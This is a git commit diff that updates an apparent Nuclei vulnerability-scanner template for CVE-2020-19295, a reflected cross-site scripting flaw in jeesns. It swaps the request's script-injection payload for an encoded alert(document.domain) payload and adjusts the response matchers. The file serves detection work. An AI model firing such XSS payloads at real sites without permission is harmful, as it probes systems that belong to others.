Update CVE-2020-19295.yaml

patch-1
Prince Chaddha 2021-09-17 16:31:20 +05:30 committed by GitHub
parent 1d63ebfe45
commit 92014aa363
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 7 deletions

View File

@ -8,21 +8,19 @@ info:
reference:
- https://github.com/zchuanzhao/jeesns/issues/21
- https://nvd.nist.gov/vuln/detail/CVE-2020-19295
tags: cves,cve2020,jeesns,xss
tags: cve,cve2020,jeesns,xss
requests:
- method: GET
path:
- "{{BaseURL}}/weibo/topic/%3CScript%3Eprompt(document.domain)%3C/Script%3E"
headers:
Content-Type: application/x-www-form-urlencoded
- "{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '<script>prompt(document.domain)</scriot>'
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
@ -30,6 +28,6 @@ requests:
- 200
- type: word
words:
- 'Content-Type: text/html'
part: header
words:
- text/html